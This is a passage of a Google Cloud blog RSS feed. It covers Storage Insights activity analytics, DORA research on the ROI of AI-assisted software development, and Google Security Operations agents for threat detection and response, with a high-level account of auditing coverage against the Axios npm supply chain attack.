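for (bucket, prefix), errors in hottest_prefixes(sample_rows, depth=2, top_n=1):
    print(f"gs://{bucket}/{prefix}/ saw {errors} errors")
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Adjust depth to match how your object names are structured; a shallow depth highlights broad hotspots, while a deeper one narrows in on specific date or shard prefixes.&lt;/span&gt;&lt;/p&gt;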
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Getting started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As your organization grows with Google Cloud, the scale of your data will only increase. Stop relying on archival data and start optimizing your organization’s storage estate. With activity insights, Storage Insights datasets for Cloud Storage turn massive data estates from complex operational challenges into clearly understood, highly optimized assets.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To get started, use our preconfigured Looker Studio template &lt;/span&gt;&lt;a href="https://lookerstudio.google.com/c/u/0/reporting/670eee3f-ad6d-45ea-a169-853ab023dc84/page/p_k94oydxikd" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to connect to your dataset for quick analysis. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example: View the trend for Total Reads on your bucket over time&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_hJhCdWP.max-1000x1000.png"
        
          alt="1"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Or, analyze the ingress and egress traffic patterns for your bucket: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_G8F8tZ4.max-1000x1000.png"
        
          alt="2"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to turn insight into action?&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/storage-intelligence/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; today in the Google Cloud console.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/insights/datasets"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Configure your dataset today&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and query your data directly in BigQuery or &lt;/span&gt;&lt;a href="https://bit.ly/si-template" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;connect to our Looker template&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for quick and easy visualization.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Reference our videos for more information on &lt;/span&gt;&lt;a href="https://youtu.be/3makK6m8sIw?si=-BjdpU2ErtZGXwSA" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Storage Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://youtu.be/r5Z_z1bgcw0?si=mkFxaY939Tkq9p6A" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;How to Get Started&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Read more about how to &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/storage-data-transfer/storage-insights-datasets-optimizes-storage-footprint?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;optimize your Cloud Storage footprint with Storage Insights datasets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/storage-data-transfer/analyze-cloud-storage-estates-with-storage-insights-datasets/</guid><category>Storage &amp; Data Transfer</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Storage Insights datasets: Enabling org-wide operational discovery with activity insights</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/storage-data-transfer/analyze-cloud-storage-estates-with-storage-insights-datasets/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Misha Sheth</name><title>Product Manager, Storage</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Kumar Nachiketa</name><title>APAC Technology Practice Lead, Storage</title><department></department><company></company></author></item><item><title>How to unlock true ROI in software development – a deep dive into the latest DORA research</title><link>https://cloud.google.com/blog/products/ai-machine-learning/how-to-measure-the-business-value-of-generative-ai/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;How do you prove the business value of generative AI to your teams? &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Technology and finance leaders need to show the clear business value of AI projects to secure ongoing funding. While measuring return on investment (ROI) is a key part of validating your technical strategy, long-term success ultimately depends on building the organizational systems and culture needed to make AI work.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help you evaluate the costs and business benefits of AI, we recently shared the DORA: &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/dora-roi-of-ai-assisted-software-development?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;ROI of AI-assisted software development report&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This research offers a practical approach to help your team work through early adoption challenges, align engineering plans, and drive business growth. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here are the key findings from the report, and how you can use them to support your overall technology strategy.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Insight #1: Navigating the J-curve of AI value realization&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It is important to be realistic about how quickly you will see a return on your AI investments. While AI can act as a powerful amplifier for software engineering, the path to financial value is rarely a straight line. Most organizations will instead encounter a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;J-curve&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: a temporary productivity dip and period of instability associated with early adoption.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This temporary drop is a normal part of adopting new technology, rather than a sign of a failing strategy. The report points to three main reasons why this happens: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The learning curve:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Teams require dedicated time away from regular feature delivery to adapt their daily workflows and master advanced techniques, evolving from simple prompting to building systems based on context and intent.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;The verification tax:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Because AI dramatically increases the volume of code produced, developers must invest extra time rigorously reviewing generated output to ensure it is trustworthy, catch hallucinations, and meet internal architectural standards.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Pipeline adaptation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; As individual developers generate code significantly faster, downstream processes like testing and change approvals often become bottlenecks and must be actively scaled to handle the increased throughput.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Budgeting for this initial learning phase is key to making the transition work. By anticipating this temporary drop in productivity, you can confidently keep your AI projects moving forward, knowing that these early challenges are an investment in your team's long-term speed.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_M6uB5gM.max-1000x1000.jpg"
        
          alt="The J-curve of AI value realization"&gt;
        
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="02esl"&gt;The J-Curve of AI value realization&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Insight #2: Understand the market divide on AI returns&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://dora.dev/dora-report-2025/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;DORA’s state of AI-assisted software development report&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; shows that 90% of survey respondents report using AI at work. Despite this near-universal adoption, the financial impact varies widely across organizations: some companies see clear value from their engineering investments, while others struggle with unexpected costs. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When a project falls short, it’s often because the team lacks the organizational support to make it work. To get the returns you expect, you need to prepare your workflows and teams to adopt the new technology. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Insight #3: Calculating your AI ROI is essential&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building a realistic financial model for AI starts with looking at where it actually adds value. Across the software development lifecycle, AI can help your team reduce costs, boost productivity, improve security, and deliver a better experience for both developers and users.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To assist in modeling this for your organization, you can use this &lt;/span&gt;&lt;a href="https://dora.dev/ai/roi/calculator" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;interactive ROI calculator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;This tool helps you explicitly forecast both the visible expenses and the hidden realities of AI adoption.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;You can explore the mechanics, adjust the assumptions to match your reality, and build your own estimate.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_Iv3XZeI.max-1000x1000.jpg"
        
          alt="The value model, from adoption to ROI"&gt;
        
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="02esl"&gt;The value model—from adoption to ROI&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Get started&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/resources/content/dora-roi-of-ai-assisted-software-development"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Download the full report&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Explore the complete framework to quantify your AI investments, navigate the J-curve, and plan your AI investment roadmap.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://dora.dev/ai/roi/calculator" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Try out the interactive ROI calculator&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Visit &lt;/span&gt;&lt;a href="https://dora.dev/ai/roi/calculator" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;https://dora.dev/ai/roi/calculator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to estimate your organization's potential returns and build a defensible business case.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Watch this Cloud OnAir webinar: &lt;/span&gt;&lt;a href="https://cloudonair.withgoogle.com/events/from-cost-center-to-value-engine" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;From cost center to value engine: Building your business case for AI-assisted development&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/ai-machine-learning/how-to-measure-the-business-value-of-generative-ai/</guid><category>AI &amp; Machine Learning</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/DORA-Report_Cover-Formats_9-16.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>How to unlock true ROI in software development – a deep dive into the latest DORA research</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/DORA-Report_Cover-Formats_9-16.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/ai-machine-learning/how-to-measure-the-business-value-of-generative-ai/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Dr. Ursula Löbbert-Passing</name><title>Ph.D., AI Value Realization Lead, delta EMEA</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Eva Dong</name><title>AI Value Realization, Delta Americas</title><department></department><company></company></author></item><item><title>Detecting and containing AI-powered threats with Google Security Operations agents</title><link>https://cloud.google.com/blog/products/identity-security/detecting-and-containing-powered-threats-with-google-security-operations-agents/</link><description>&lt;div class="block-paragraph"&gt;&lt;p data-block-key="eucpw"&gt;To defend against the growing range of AI-accelerated threat actors, organizations need to be able to respond faster to outpace the adversary.&lt;/p&gt;&lt;p data-block-key="8q6td"&gt;Recently, &lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-ai-threat-defense"&gt;we announced Google AI Threat Defense&lt;/a&gt;, an automated security system designed to 
help you continuously monitor for and stop AI-powered threats before they can impact your business. Based on Google’s own approach to today’s threats and vulnerability management, it’s centered on a four-step framework: prepare, scan and prioritize, remediate, and monitor.&lt;/p&gt;&lt;p data-block-key="1uk59"&gt;Today, we’re sharing more details on how &lt;a href="https://cloud.google.com/security/products/security-operations"&gt;Google Security Operations&lt;/a&gt; works in concert with AI Threat Defense to monitor, detect, and respond to threats, particularly from code you do not own or cannot patch. That remediation gap is itself a critical vulnerability.&lt;/p&gt;&lt;p data-block-key="55ndt"&gt;According to &lt;a href="https://services.google.com/fh/files/misc/m-trends-2026-executive-edition-en.pdf" target="_blank"&gt;M-Trends 2026&lt;/a&gt;, the exploitation of vulnerabilities has become the most common initial infection vector. Notably, the report also indicates that the mean time to exploit has dropped to an estimated minus seven days, meaning exploitation frequently occurs even before a patch is officially released. Google Security Operations provides the operational fabric to autonomously contain active attacks across your entire environment.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/AI_Threat_Wheel_-_4_Monitor.max-1000x1000.png"
        
          alt="AI Threat Wheel - 4 Monitor"&gt;
        
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="t8ado"&gt;Google Security Operations supports AI Threat Defense to monitor, detect, and respond to threats.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p data-block-key="psooj"&gt;To strengthen operational resilience, Google Security Operations pairs compensating controls with proactive security. It is built on a three-part approach to visibility across your entire attack surface:&lt;/p&gt;&lt;ul&gt;&lt;li data-block-key="94t25"&gt;Continuous and autonomous coverage analysis and detection generation&lt;/li&gt;&lt;li data-block-key="103dl"&gt;Autonomous investigation, containment, and response&lt;/li&gt;&lt;li data-block-key="90gg6"&gt;Retroactive hunting&lt;/li&gt;&lt;/ul&gt;&lt;p data-block-key="5n4gt"&gt;These capabilities are designed to help you see and respond to threats faster, and we deliver them at machine scale and machine speed. Together with &lt;a href="https://cloud.google.com/security/ai-threat-defense"&gt;Google AI Threat Defense&lt;/a&gt;, we’re able to provide the autonomous platform you need to outpace AI-driven attacks.&lt;/p&gt;&lt;h3 data-block-key="84lj0"&gt;&lt;b&gt;1. Continuous and autonomous coverage analysis and detection generation&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="e8bek"&gt;While proactive defense can identify vulnerabilities before they can be exploited, there will be applications that you cannot patch, as well as delays before vulnerabilities are remediated.&lt;/p&gt;&lt;p data-block-key="52cg1"&gt;The &lt;a href="https://www.verizon.com/business/resources/T3ef/reports/2026-dbir-data-breach-investigations-report.pdf" target="_blank"&gt;2026 Verizon Data Breach Investigations Report&lt;/a&gt; underscores the magnitude of this challenge. In a study encompassing over 13,000 organizations, only 26% of vulnerabilities identified on the CISA Known Exploited Vulnerabilities (KEV) list had been fully remediated. Moreover, the median time to fully patch after detection was 43 days. 
Clearly, you still need continuous monitoring to detect threats in your environments.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=h9rejA7OAxI"
      data-glue-modal-trigger="uni-modal-h9rejA7OAxI-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/SecOps-AITD_YouTube_Thumbnail.max-1000x1000.png);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Detection Engineering agent. Results for illustrative purposes.&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
      &lt;figcaption class="article-video__caption h-c-page"&gt;
        
          &lt;h4 class="h-c-headline h-c-headline--four h-u-font-weight-medium h-u-mt-std"&gt;Detection Engineering agent. Results for illustrative purposes.&lt;/h4&gt;
        
        
        
      &lt;/figcaption&gt;
    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-h9rejA7OAxI-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="h9rejA7OAxI"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=h9rejA7OAxI"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p data-block-key="prjrl"&gt;The &lt;b&gt;Detection Engineering agent&lt;/b&gt; in Google Security Operations can automatically translate new exploitation patterns of unpatched vulnerabilities into custom detections for your specific environment. Available in preview, it analyzes a wide range of input sources to quickly and effectively recognize malicious activity, so you can uncover novel attack patterns evolving from new and unpatched vulnerabilities.&lt;/p&gt;&lt;p data-block-key="6o4e6"&gt;The agent’s sources include Google Threat Intelligence (such as emerging threat intelligence, new attack patterns curated by Mandiant, offensive tool repositories, red and purple team reports, autonomous malware analysis, and open-source detection repositories and blogs) as well as internal security telemetry.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Blog_AgenticDetection_workflow.max-1000x1000.png"
        
          alt="The workflow of the Detection Engineering agent"&gt;
        
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="4bxt7"&gt;The workflow of the Detection Engineering agent.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p data-block-key="4bd61"&gt;To find and fill coverage gaps specific to your environment, the agent proactively builds new rules and validates them with synthetic events, helping ensure you are covered before an exploit hits.&lt;/p&gt;&lt;h3 data-block-key="djss9"&gt;&lt;b&gt;2. Autonomous investigation, containment, and response&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="6dpjh"&gt;If a threat is detected, you need to assess it and respond immediately and autonomously to protect your environment. By bringing together visibility from cloud and enterprise assets, including endpoints, on-premises firewall, identity, network, and custom application logs, your security operations center (SOC) can gain the full context of an attack and unify disparate signals into a complete, actionable narrative the moment an adversary strikes.&lt;/p&gt;&lt;p data-block-key="3ji8q"&gt;The &lt;b&gt;Triage and Investigation agent&lt;/b&gt; in Google Security Operations, generally available, helps analysts drastically reduce time to respond by autonomously investigating alerts, gathering evidence for analysis, and providing verdicts with comprehensive explanations. It can help security analysts automate decision-making, alert closure, and remediation flows, allowing them to spend more time on high-priority threats instead of false positives.&lt;/p&gt;&lt;p data-block-key="3mn0q"&gt;The agent has already investigated over 5 million alerts, reducing a typical 30-minute manual analysis to 60 seconds with Gemini.&lt;/p&gt;&lt;p data-block-key="360r1"&gt;While identifying threats is critical, the ultimate goal is rapid remediation. 
&lt;a href="https://cloud.google.com/blog/products/identity-security/rsac-26-supercharging-agentic-ai-defense-with-frontline-threat-intelligence"&gt;&lt;b&gt;Agentic automation&lt;/b&gt;&lt;/a&gt;, available in preview, can help contain attacks by combining dynamic AI agents, which autonomously gather evidence and reason through complex alerts, with deterministic enterprise playbooks.&lt;/p&gt;&lt;p data-block-key="cvfhl"&gt;This hybrid approach keeps analysts in control of critical, high-impact actions while using AI to safely automate decision-making and remediation workflows.&lt;/p&gt;&lt;h3 data-block-key="b11bq"&gt;&lt;b&gt;3. Retroactive hunting&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="9iovv"&gt;Even with autonomous detections and rapid-response handling of active threats, stealthy adversaries and zero-day exploits can sometimes bypass frontline controls. To achieve operational resilience, security teams must also look backward through their data to uncover hidden compromises.&lt;/p&gt;&lt;p data-block-key="355i4"&gt;Strong, effective defensive strategies rely on more than just reacting to alerts. The &lt;b&gt;Threat Hunting agent&lt;/b&gt;, available in preview, can help teams proactively hunt for novel attack patterns and stealthy adversary behaviors that bypass traditional defenses.&lt;/p&gt;&lt;p data-block-key="eamnc"&gt;By scouring petabytes of enterprise telemetry (including historical logs) for subtle anomalies, the agent shifts the SOC posture from reactive to proactive.&lt;/p&gt;&lt;h3 data-block-key="5ke81"&gt;&lt;b&gt;Auditing the Axios supply chain attack&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="cka6e"&gt;When adversaries can generate unique exploits and command-and-control (C2) infrastructure at zero marginal cost, static indicators like hashes and IPs decay almost instantly. 
Defenders must instead detect the behavioral tactics, techniques, and procedures (TTPs) of the attack.&lt;/p&gt;&lt;p data-block-key="17iv1"&gt;We had the Detection Engineering agent audit our coverage against the recent &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package"&gt;Axios supply chain attack&lt;/a&gt; (UNC1069). The agent mapped the campaign intelligence into behavioral threat detection opportunities (TDOs), simulated the attack chain using high-fidelity synthetic Unified Data Model (UDM) logs, and ran those logs against our active rules.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Google_Detection_Engineering_agent_output.max-1000x1000.png"
        
          alt="Google Detection Engineering agent output"&gt;
        
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="56ozc"&gt;Google Detection Engineering agent output.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p data-block-key="29tyz"&gt;Our existing rules flagged the execution phases in the middle of the chain (renamed PowerShell and macOS background shells), but we were blind at the initial entry point (npm postinstall dropper) and the final C2 exit point.&lt;/p&gt;&lt;p data-block-key="dfv8i"&gt;By exposing these blind spots, the agent helped us proactively engineer custom YARA-L rules to close the loop at the first and final steps of the kill chain. You can sign up for the Google Security Operations &lt;a href="https://docs.google.com/forms/d/14pJvNEZvCtk8NkTiA0QFKCQ0_QfQ-3FJn6ndPBsi_K4/edit?chromeless=1" target="_blank"&gt;Detection Engineering agent preview today&lt;/a&gt;.&lt;/p&gt;&lt;h3 data-block-key="a9it"&gt;&lt;b&gt;Next steps&lt;/b&gt;&lt;/h3&gt;&lt;p data-block-key="64qqr"&gt;By integrating the Gemini-native specialized agents in Google Security Operations into your workflow, you can autonomously generate detections, orchestrate containment, and hunt for stealthy threats at machine speed. This allows you to maintain a resilient defense even when primary controls fail, ultimately driving a 70% reduction in both breach risks and costs.&lt;/p&gt;&lt;p data-block-key="dt4he"&gt;Google AI Threat Defense, working alongside Google Security Operations, can help you consistently outpace automated adversaries. 
